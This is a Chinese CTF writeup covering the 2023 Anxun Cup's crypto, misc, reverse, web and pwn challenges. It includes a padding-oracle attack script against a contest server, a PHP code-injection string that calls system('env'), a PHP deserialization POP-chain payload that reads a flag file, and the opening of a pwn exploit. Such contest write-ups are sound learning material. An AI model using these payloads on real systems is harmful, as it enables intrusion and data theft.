2023 第六届安洵杯 writeup by Arr3stY0u

admin

102755
文章

87
评论

2024年1月10日15:49:00评论13 views字数 29255阅读97分31秒阅读模式

2023 第六届安洵杯 writeup by Arr3stY0u

HEADER

CTF组招新联系QQ2944508194，简历需为正式简历格式、请标注在赛事中的个人产出比，例如：某比赛团队总分2000分，我解出两个crypto共计500分占比25%。

所有方向均有名额，请不要担心投简历被拒等情况，未达标准我们会指出不足之处、给出学习建议。

CRYPTO

010101

漏洞点在

p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'

p1只是随机的把1的位置转一个变成0，p2把0的位置随机转一个到1，直接逆回去即可

charon@root:~/Desktop$ nc 124.71.177.14 10001SHA256(XXXX + 46tr7JsAnftJaAj2):bb607c005123726d6b766c22aae953c9b940e577c6eee1834d58d7b4c8aed0bcGive Me XXXX:1sytPress 1 to get ciphertext160193174556824949951075954803233003012816842690127307013510848085346068610971287323876920567332357394122271978453722692457494759798599533250216644767344100147205757319259042511024425933666556684039902639955101810139671259542396251755746455288801028875220258179860863529775701930079256910152846601392232532282209264644554936501718333633068288255331839708706453437022604550696485775468107214433647142338976159359340611823716414851969716109410145514867492749907335929882188585826396855702227989094931315162925698963478866567024466631753790684450624332658872491214428430812988549793793090443138202365654656967830789022109840423787811071805221741453351818771857714177787861825654940160610738012477418672095750642785039751733677142793282708135464838052384986960446905830989908347842119190363468604134025815754338956523711042111079335239435093606014630717749855727048217630149446806934215370001997261252196944147153515660455403386295459397159476008740650783351875870788633500143273859204334981976611258076796194034758380177159012181004978352431457721036954027015879944370720046627251242934827003352629496019813125896143664802547084184729934742025133039198077975240749405903801407144490678961949065090990727629407793704805894056223679969091710110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581

exp

from gmpy2 import *from Crypto.Util.number import *from tqdm import *n=601931745568249499510759548032330030128168426901273070135108480853460686109712873238769205673323573941222719784537226924574947597985995332502166447673441001472057573192590425110244259336665566840399026399551018101396712595423962517557464552888010288752202581798608635297757019300792569101528466013922325322822092646445549365017183336330682882553318397087064534370226045506964857754681072144336471423389761593593406118237164148519697161094101455148674927499073359298821885858263968557022279890949313151629256989634788665670244666317537906844506243326588724912144284308129885497937930904431382023656546569678307890221098404237878110718052217414533518187718577141777878618256549401606107380124774186720957506427850397517336771427932827081354648380523849869604469058309899083478421191903634686041340258157543389565237110421110793352394350936060146307177498557270482176301494468069342153700019972612521969441471535156604554033862954593971594760087406507833518758707886335001432738592043349819766112580767961940347583801771590121810049783524314577210369540270158799443707200466272512429348270033526294960198131258961436648025470841847299347420251330391980779752407494059038014071444906789619490650909907276294077937048058940562236799690917p='10110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011'c=363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581# p1=p[:1024]# p2=p[1024:]# pp1=[i for i, c in enumerate(p1) if c == '0']# pp2=[i for i, c in enumerate(p1) if c == '1']# print(pp1)# for i in tqdm(pp1):#     p1 = list(p[:1024])#     p1[i]='1'#     for j in pp2:#         p2 = list(p[1024:])#         p2[j]='0'#         ppp=''.join(p1) + ''.join(p2)#         ppp2=int(ppp,2)#         if n%ppp2==0:#             print(ppp2)#             breakp=23035125732261132358670499878109017381474612877560501678840135971884602002596362770042962719837871778607403423140553717636949563024173949672281747566044348211883894971758093237914208347253908009359914127501739323351540268777972140879841918587634194478383649138731012434783470970638093549174619359989933572268463391374193459608549354611510909253795420360095279545780658678412847237770763508515088914878492525553581261678529131687242421476753253431930293211570439334452217877146659650508457581300434519215816445425880176422556848574152119462509229109443358566019337029013527249995191088717060570352636009477629767659827print(isPrime(p))q=n//pe = 0x10001d=invert(e,(p-1)*(q-1))m=pow(c,d,n)print(long_to_bytes(m))

b'D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}'

POA

cbc padding attack

from pwn import *from hashlib import sha256import stringfrom pwnlib.util.iters import mbruteforceimport binasciir = remote("124.71.177.14",10010)
table = string.ascii_letters+string.digitsdef pow():    r.recvuntil("XXXX + ")    suffix = r.recv(16).decode("utf8")    r.recvuntil(":")    cipher = r.recvline().strip().decode("utf8")    proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==                        cipher, table, length=4, method='fixed')    r.sendline(proof)
pow()r.sendline('1')r.recvuntil('This is your flag: ')c=r.recvuntil('n',drop=True)print('c=',c)iv = c[:32]cipher = c[32:]enc=binascii.unhexlify(cipher)iv=binascii.unhexlify(iv)print('enc=',enc)print('iv=',iv)pt = bytearray(b'x00'*16)for make_pad_len in range(1, 17):    xored_iv = bytearray(16)    for i in range(16):        xored_iv[i] = iv[i] ^ pt[i]    index = 16-make_pad_len    for i in range(0x100):        _iv = bytearray(16)        for j in range(index, 16):            _iv[j] = xored_iv[j] ^ make_pad_len        _iv[index] = i        _iv = bytes(_iv.rjust(16, b'x00'))+enc        ivv=_iv.hex()        r.sendline('2')        r.recvuntil('Please enter ciphertext:n')        # print('tt=',len(tt))        print('ivv=',ivv)        r.send(str(ivv))        res=r.recvuntil('n')        # print('res=',res)        if b'True' in res:            v = i ^ iv[index] ^ make_pad_len            pt[index] = v            print(chr(v), pt.hex(), bytes(pt))            breakr.interactive()

ivv= 10660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 11660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 12660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 13660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 14660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 15660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 16660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 17660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 18660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 19660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdM 4d467b305040643454746b7d04040404 b'MF{0P@d4Ttk}x04x04x04x04'[*] Switching to interactive mode

D0g3{0P@d4Ttk}

Rabin

第一步爆破x，获得r,从而n1=n//r=p*q

第二步注意到inv_p*p+inv_q*q=n1+1,再加上p*q=n1,可以求得p，q

第三步，爆破e2,根据p，q直接求d，解密第二部分m，验证前10个字符isprintable就可以爆破出，e2 为 5，第二部分40-a9e4-a67a9ba15345}

第三步，根据relation()，以及第一步，判断x比较可能是8，根据e2,爆破e1是2，rabin解密得到第一段D0g3{82309bce-9db6-53

最终flag:D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}

Python代码如下：

from Crypto.Util.number import *from gmpy2 import *n = 285333097560579856892735567589027491455281816676548482904879584411084840450605271899236335787378212457644480538489333957199681005051324763317061914445335184643625612096862543286134102802857549376968548460142475231575293784694948584292852369440735047979684088368282494500434727138560870002195137014489167165627331632368455059106946492710112045617183371020744982960108917884038933243553293376828996387182739769132792122496876799056412450480295939241242493468339649702797915685408056205502660879129130498545921410634619659281124474952328520326377732861327885460825785663612083850698299251860568500798463658863076047273218029864658192865375924206328915181982984562250516942987232706349911392265126207255534866190377014380855435918220022982938162059864440683044775523888991188203006479911766073854154460130165113177584072109403534582913430806912608626570189230138578926612739070744683368688850886527094463667668825307246359436635233811527374246463299941661976846168659355118349992007638908363168630724274951inv_p = 15518556384860245743478620429603192585685787953718242976660224479750998999124338822955414145628584896866254074982803409103638138579055846815417400924284717580342975268418607314979326166327341036902072011846895021125831579420772494902187900359222937225476944827334097644914928633555605528401231109679269995086inv_q = 155844952786694191575297403428699000736198123964886234441336879931357938912183547278484904361669861403393518512602888045819050991788625527088116664969187555777028144199786402659623855374576202766323863308930997626431142188895581868394783999218343754370726823809671619460649473747905784816603565738974432428480c1 = 126976144638062411994384099639219893719548652649797747968794241772829388392059131204549804095367482955713969969355185232593725760428681633925245739792469765283064470833596211603668120879365838887254328902988534426769340803326035688970033255868390278666156442829111587282507934612148101514683146219594379325568501808994038719784055659363522080979550015313702694077294838434724135616183144122907039758450363380287762050096893679619122349248941856699588431034712017310975233907480446137538753544059977757157457507646299200188974533402557530497781126307449150221146472482007846609714342333817505591830507656245367858711393207787365997909956902207542164544097922462033634018795680632571241102059887769247904527047628319436872644835675831505379779011242527097220466159871163455244971911311179106589058265977916423231213266773521104981166940713044082334510252946317916149089661406584941263677321406447326099096001132473765127971954144881177204994916711534164440380921197150440049304017047080659500777241740528c2 = 146941331442564610016438819735547244506352704046774905613426284012869732747925710307265626766652735661835157362691409229558530888941189129960135439286471184689177437139594351730287457489682323200067610139473500557213628686488936379775312971741967583943854236936993185362784886957646210710012024839783323641398605391643544058597455541620941929330435766958836695050614733661967896963275403693970761214082313515330149780215334487889969179336091893274890943467738514867511025492419144817240630139160081094440537994689088123579690334770462633832325163789325881676740410159219779623129230840988303480150753783702883385763373756192046417120986761450383952686760580908911815204339547584815987309530429459803006137138710075476256076429790734381285100612579775390606666816783573924249773339782127155714010817196675330870127749087069339556243710348583718134476356016094530370196897414589976876765847625687561629780514239120563907981343926849715187507551839537984064153228278609868504300922982445067467503667611505

r=10407932194664399081925240327364085538615262247266704805319112350403608059673360298012239441732324184842421613954281007791383566248323464908139906605677320762924129509389220345773183349661583550472959420547689811211693677147548478866962501384438260291732348885311160828538416585028255604666224831890918801847068222203140521026698435488732958028878050869736186900714720710555703168729087p=172734683184670521870728305371917464596062609133662457971030651681563614292692150176606848807534588267834112546004233695199322884456898046304537198440536833886920821550944800659049952451650465399792357613884244821145480278404875760748959392209037101099598435512738382399052937036823852468261051762813693137499q=158711409682623467193918200983728047440421670534311259267841341750844583719487872424882600690624065414558783083519077629543263229349472283576912545178060245058165997332172994084313993698397899585980714769786106061192880855558784452710588701697475203159038487141201679925814406643761912866831915524057271725627assert inv_p==invert(p,q)assert inv_q==invert(q,p)assert n==p*q*rn1=n//r#2 · 3^2 · 71phi=(p-1)*(q-1)def test(m):    for i in m:        if i<30 or i>128:            return 0    return 1print(phi)def relation(e1,e2):    a, b = 0, 0    for i in range(8 - (2**2 - 1)):        a += pow(e1, i)    for j in range(3):        b += pow(e2, j)    if a == b:        return True    return Falsee1=2e2=5mp = pow(c1, (p + 1) // 4, p)mq = pow(c1, (q + 1) // 4, q)a = (inv_p * p * mq + inv_q * q * mp) % n1b = n1 - int(a)c = (inv_p * p * mq - inv_q * q * mp) % n1d = n1- int(c)for i in (a, b, c, d):    print(long_to_bytes(i))exit()
exit()for i in range(1,600):    if(relation(i,e2)):        print(i)exit()#D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}from tqdm import tqdmfor i in tqdm(range(4,6)):    if gcd(i,phi)>1:        continue    d=invert(i,phi)    m=pow(c2,d,n1)    m=long_to_bytes(m)    if b"}" in m[:30] and test(m[:10])==1:        print(i,m)exit()for x in range(2,100):    r = 2    print("begin",x)    while True:        r = r * x        if r.bit_length() > 1024 and isPrime(r - 1):            r = r - 1            break    if n%r==0:        print(x,r)

MISC

dacongのWindows

桌面flag3一串PBE

2023 第六届安洵杯 writeup by Arr3stY0u

根据描述提示注册表，windows.registry.printkey拿到一串字符d@@Coong_LiiKEE_F0r3NsIc

2023 第六届安洵杯 writeup by Arr3stY0u

aes解出flag3

2023 第六届安洵杯 writeup by Arr3stY0u

document下secret.rar

2023 第六届安洵杯 writeup by Arr3stY0u

rstudio恢复出来解压有点问题，用vol3

2023 第六届安洵杯 writeup by Arr3stY0u

一堆空白

2023 第六届安洵杯 writeup by Arr3stY0u

很明显的snow了

2023 第六届安洵杯 writeup by Arr3stY0u

拿到flag2

2023 第六届安洵杯 writeup by Arr3stY0u

提示music

2023 第六届安洵杯 writeup by Arr3stY0u

dacong_like_listen下面一堆wav，听上去就很像sstv，一个一个试过去

39.wav拿到flag1

2023 第六届安洵杯 writeup by Arr3stY0u

拼接flag

flag{Ar3_Th3Y_tHE_DddddAc0Ng_SIst3Rs????}

签到处

D0g3{We1come_TO_AXB_F1111@g}

Nahida

reverse jpg

2023 第六届安洵杯 writeup by Arr3stY0u

文件尾

2023 第六届安洵杯 writeup by Arr3stY0u

反复提到眼睛，猜测silenteye。那个你一直在寻找的答案，早已出现在你的旅途，fuzz后指的是密码是题目名

2023 第六届安洵杯 writeup by Arr3stY0u

dacongのsecret

png fft拿到第一个密码

2023 第六届安洵杯 writeup by Arr3stY0u

同样套路，jpg文件尾reverse 压缩包

2023 第六届安洵杯 writeup by Arr3stY0u

又要密码

回去看png，很明显19 chunk块长度小于0x10000，那么20 chunk块肯定是多余的（经测试删除后png不会少任何像素）

2023 第六届安洵杯 writeup by Arr3stY0u

将19chunk块拿出来，补个png文件头（直接用题目png的文件头）

2023 第六届安洵杯 writeup by Arr3stY0u

爆破一下宽高，860*123拿到key

2023 第六届安洵杯 writeup by Arr3stY0u

解压后，一眼base64隐写

2023 第六届安洵杯 writeup by Arr3stY0u

拿到pass，fuzz后是上一个jpg的jphs，拿到flag

2023 第六届安洵杯 writeup by Arr3stY0u

疯狂的麦克斯

1.将docx文件转换为zip提取隐藏文件

2023 第六届安洵杯 writeup by Arr3stY0u

2.将麦克斯的称号打开后解密零宽字符得到麦克斯的称号

2023 第六届安洵杯 writeup by Arr3stY0u

3.将隐藏的txt文件打开后发现为一个列表，列表的末尾有一串密文

2023 第六届安洵杯 writeup by Arr3stY0u

使用rot13并将amount设置为22后密文解密后得到THIS IS MKS DO YOU KNOW WHOAMI

2023 第六届安洵杯 writeup by Arr3stY0u

4.将列表也进行同样的解密，根据题目描述，只要将列表每一个值进行base64加密后，就可以在其中找到正确的压缩包密码

2023 第六届安洵杯 writeup by Arr3stY0u

脚本如下

import base64
lst = ['71132E', '328051N', '248199O'...]
# 加密函数def encrypt_string(string):    encoded_bytes = base64.b64encode(string.encode('utf-8'))    return encoded_bytes.decode('utf-8') 
# 打开文件with open('output.txt', 'w') as file:    # 遍历列表中的每一个值    for value in lst:        # 加密并写入文件        encrypted_value = encrypt_string(value)        file.write(encrypted_value + 'n')

爆破

2023 第六届安洵杯 writeup by Arr3stY0u

解压压缩包得到flag

2023 第六届安洵杯 writeup by Arr3stY0u

REVERSE

MobileGo

libgojni.so的mobile_go_Checkflag函数完成加密，首先初始化随机数生成器，种子为2023

2023 第六届安洵杯 writeup by Arr3stY0u

之后随机生成两个随机数并将其作为索引完成flag中字符位置的互换

2023 第六届安洵杯 writeup by Arr3stY0u

解密脚本如下，首先通过Go语言生成伪随机数

package main
import (  "fmt"  "math/rand")func main() {  source := rand.NewSource(2023)  random := rand.New(source)  for i := 0; i < 0x26; i++ {    randomNumber := random.Intn(0x26)    randomNumber1 := random.Intn(0x26)    fmt.Print("[", randomNumber, ",", randomNumber1, "]")    fmt.Print(",")  }}

然后从后往前还原，密文从Android的资源文件中提取

flag=bytearray(b"49021}5f919038b440139g74b7Dc88330e5d{6")key=[[11,14],[15,37],[24,18],[8,30],[6,9],[30,3],[29,9],[4,13],[13,24],[37,1],[28,28],[3,1],[23,22],[21,26],[7,19],[1,34],[37,17],[27,29],[31,30],[14,2],[35,34],[4,27],[9,3],[3,24],[30,29],[3,27],[14,25],[26,0],[4,28],[5,15],[9,9],[13,18],[24,3],[35,24],[36,27],[25,21],[11,4],[27,28]]for row in reversed(key):    tmp=flag[row[0]]    flag[row[0]]=flag[row[1]]    flag[row[1]]=tmpprint(flag)

D0g3{4c3b5903d11461f94478b7302980e958}

你见过蓝色的小鲸鱼

通过IDA插件可知`BlowFish`加密算法，用户名作为密钥，提取密文后编写脚本解密

2023 第六届安洵杯 writeup by Arr3stY0u

from Crypto.Cipher import Blowfishkey=b'UzBtZTBuZV9EMGcz'bf=Blowfish.new(key,Blowfish.MODE_ECB)enc=b"x11xA5x1Fx04x95x50xE2x50x8Fx17xE1x6CxF1x63x2Bx47"print(bf.decrypt(enc))#QHRoZWJsdWVmMXNo

牢大想你了

反编译Assembly-CSharp.dll文件

其中GameManager.OnValueChanged对输入完成TEA加密

2023 第六届安洵杯 writeup by Arr3stY0u

解密脚本如下

#include<string.h>#include <stdio.h>
int main(){  unsigned int Data[12] = { 3363017039U,      1247970816U,      549943836U,      445086378U,      3606751618U,      1624361316U,      3112717362U,      705210466U,      3343515702U,      2402214294U,      4010321577U,      2743404694U };  unsigned int key[4] = { 286331153,      286331153,      286331153,      286331153 };  unsigned int tmp[2] = { 0 };  unsigned int sum = 0;  unsigned int delta = 0x9e3779b9;  for (int i = 0; i < 12; i += 2)  {    tmp[0] = Data[i];    tmp[1] = Data[i + 1];    sum = delta * 32;    for (int j = 0; j < 32; ++j)    {      tmp[1] -= ((tmp[0] << 4) + key[2]) ^ (tmp[0] + sum) ^ ((tmp[0] >> 5) + key[3]);      tmp[0] -= ((tmp[1] << 4) + key[0]) ^ (tmp[1] + sum) ^ ((tmp[1] >> 5) + key[1]);      sum -= delta;    }    Data[i] = tmp[0];    Data[i + 1] = tmp[1];    printf("%c%c%c%c%c%c%c%c", ((char*)&Data[i])[0], ((char*)&Data[i])[1], ((char*)&Data[i])[2], ((char*)&Data[i])[3], ((char*)&Data[i + 1])[0], ((char*)&Data[i + 1])[1], ((char*)&Data[i + 1])[2], ((char*)&Data[i + 1])[3]);  }
  return 0;}

结果为 it_is_been_a_long_day_without_you_my_friend

你好,PE

找到关键代码，有点像CRC64

2023 第六届安洵杯 writeup by Arr3stY0u

搜了个脚本一把梭

import struct
def decode_k(v):    is_negative = v & 1    if is_negative:        v ^= 0x54AA4A9    v >>= 1    if is_negative:        v |= 0x8000000000000000    return v
g_key = '4DB87629F5A99E595556B1C42F212C30B3797817A8EDF7DBE153F0DBE903515E09C100DFF096FCC1B5E6629501000000'g_key = bytearray.fromhex(g_key)single_len = 8g_output = [g_key[x:x+single_len] for x in range(0, 6*single_len, single_len)]g_output = [struct.unpack('<Q', x)[0] for x in g_output]
def decode_j(v):    for k in range(64):        v = decode_k(v)    return v
r = [decode_j(x) for x in g_output]flag = [struct.pack('<Q', x) for x in r]flag = [x.decode() for x in flag]print(''.join(flag))#D0g3{60E1E72A-576A8BF0-7701CBB9-B02415EC}

感觉有点点简单

主函数获取数据后进行魔改rc4和魔改base64加密

2023 第六届安洵杯 writeup by Arr3stY0u

rc4魔改了sbox的大小和最后异或结果

2023 第六届安洵杯 writeup by Arr3stY0u

base64魔改了表和位运算的操作

2023 第六届安洵杯 writeup by Arr3stY0u

解密脚本

#include<stdio.h>#include<stdlib.h>#include<string.h>#define sboxSize 64
unsigned char findPos(const unsigned char* base64_map, unsigned char c)//查找下标所在位置{  for (int i = 0; i < strlen((const char*)base64_map); i++)  {    if (base64_map[i] == c)      return i;  }}unsigned char* base64_decode(const unsigned char* code0){  unsigned char* code = (unsigned char*)code0;  unsigned char base64_map[65] = "4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh";  long len, str_len, flag = 0;  unsigned char* res;  len = strlen((const char*)code);  if (code[len - 1] == '=')  {    if (code[len - 2] == '=')    {      flag = 1;      str_len = len / 4 * 3 - 2;    }
    else    {      flag = 2;      str_len = len / 4 * 3 - 1;    }
  }  else    str_len = len / 4 * 3;  res = (unsigned char*)malloc(sizeof(unsigned char) * str_len + 1);  unsigned char a[4] = { 0 };
  for (int i = 0, j = 0; j < str_len - flag; j += 3, i += 4)  {    a[0] = findPos(base64_map, code[i]);    //code[]每一个字符对应base64表中的位置,用位置值反推原始数据值    a[1] = findPos(base64_map, code[i + 1]);    a[2] = findPos(base64_map, code[i + 2]);    a[3] = findPos(base64_map, code[i + 3]);    res[j] = a[0] | ((a[1] & 0x3) << 6);//第一个字符对应    res[j + 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);    res[j + 2] = ((a[3] & 0x3f) << 2) | ((a[2] & 0x30) >> 4);    //res[j] = a[0] << 2 | a[1] >> 4;    //取出第一个字符对应base64表的十进制数的前6位与第二个字符对应base64表的十进制数的后2位进行组合      //res[j + 1] = a[1] << 4 | a[2] >> 2;  //取出第二个字符对应base64表的十进制数的后4位与第三个字符对应bas464表的十进制数的后4位进行组合      //res[j + 2] = a[2] << 6 | a[3];     //取出第三个字符对应base64表的十进制数的后2位与第4个字符进行组合   }
  switch (flag)  {  case 0:break;  case 1:  {    a[0] = findPos(base64_map, code[len - 4]);    a[1] = findPos(base64_map, code[len - 3]);    res[str_len - 1] = a[0] | ((a[1] & 0x3) << 6);    break;  }  case 2: {    a[0] = findPos(base64_map, code[len - 4]);    a[1] = findPos(base64_map, code[len - 3]);    a[2] = findPos(base64_map, code[len - 2]);    res[str_len - 2] = a[0] | ((a[1] & 0x3) << 6);//第一个字符对应    res[str_len - 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);    //res[str_len - 2] = a[0] << 2 | a[1] >> 4;    //res[str_len - 1] = a[1] << 4 | a[2] >> 2;    break;  }  }  res[str_len] = '';  return res;}
unsigned char sbox[sboxSize] = { 0 };void swap(unsigned char* a, unsigned char* b){  unsigned char tmp = *a;  *a = *b;  *b = tmp;}void init_sbox(unsigned char key[], int keyLen) {  for (unsigned int i = 0; i < sboxSize; i++)//赋值    sbox[i] = i;  unsigned char Ttable[sboxSize] = { 0 };  for (int i = 0; i < sboxSize; i++)    Ttable[i] = key[i % keyLen];//根据初始化t表  for (int j = 0, i = 0; i < sboxSize; i++)  {    j = (j + sbox[i] + Ttable[i]) % sboxSize;  //打乱s盒    swap(&sbox[i], &sbox[j]);  }}void RC4_enc_dec(unsigned char data[], int dataLen, unsigned char key[], int keyLen) {  unsigned char i = 0, j = 0;  init_sbox(key, keyLen);  for (unsigned int h = 0; h < dataLen; h++)  {    i = (i + 1) % sboxSize;    j = (j + sbox[i]) % sboxSize;    swap(&sbox[i], &sbox[j]);    data[h] ^= (i^j)&sbox[(((i^j)+sbox[i]+sbox[j])%sboxSize)];  }}
int main() {  unsigned char BaseData[] = "6zviISn2McHsa4b108v29tbKMtQQXQHA+2+sTYLlg9v2Q2Pq8SP24Uw=";  unsigned char* result=base64_decode(BaseData);//魔改base  RC4_enc_dec(result, 41,(unsigned char*)"the_key_", 8);//魔改rc4
  printf("%s", result);  return 0;}

WEB

what’s my name

2023 第六届安洵杯 writeup by Arr3stY0u

?d0g3=’”]);}system(‘env’);;;;/*include&name=%00lambda_32

跑32次

easy_unserialize

<?phpclass Good{    public $g1;    private $gg2='*&'; }class Luck{    public $l1;    public $ll2;    private $md5=1131911;    public $lll3;}class To{    public $t1;    public $tt2;    public $arg1 = array("guangji"=>1);     }class You{    public $y1;     }class Flag{ }$F = new Flag;$F->SplFileObject = "/FfffLlllLaAaaggGgGg";$F->b = "";$l2 = new Luck;$l2->l1 = $F;$t2 = new To;$t2->t1 = $l2;$l = new Luck;$l->ll2 = $t2;$t = new To;$t->tt2 = $l;$g = new Good;$g->g1 = $t;$r = new Luck;$r->lll3 = $g;$q = new You;$q->y1 = $r;echo urlencode(serialize($q));

payload

D0g3=O%3A3%3A%22You%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BO%3A4%3A%22Good%22%3A2%3A%7Bs%3A2%3A%22g1%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BN%3Bs%3A3%3A%22tt2%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BO%3A4%3A%22Flag%22%3A2%3A%7Bs%3A13%3A%22SplFileObject%22%3Bs%3A20%3A%22%2FFfffLlllLaAaaggGgGg%22%3Bs%3A1%3A%22b%22%3Bs%3A0%3A%22%22%3B%7Ds%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A3%3A%22tt2%22%3BN%3Bs%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Good%00gg2%22%3Bs%3A2%3A%22%2A%26%22%3B%7D%7D%7D

PWN

seccomp

2023 第六届安洵杯 writeup by Arr3stY0u

一个输入长gadget的全局变量，一次溢出机会

2023 第六届安洵杯 writeup by Arr3stY0u

有沙箱，但是可以orw读出flag，借助一部分srop的手法加以利用

from pwn import *import timeimport subprocesscontext(arch='amd64',os='linux',log_level='debug')command = "ls -l"#p = process('./chall')p=remote("47.108.206.43",22039)elf = ELF("./chall")
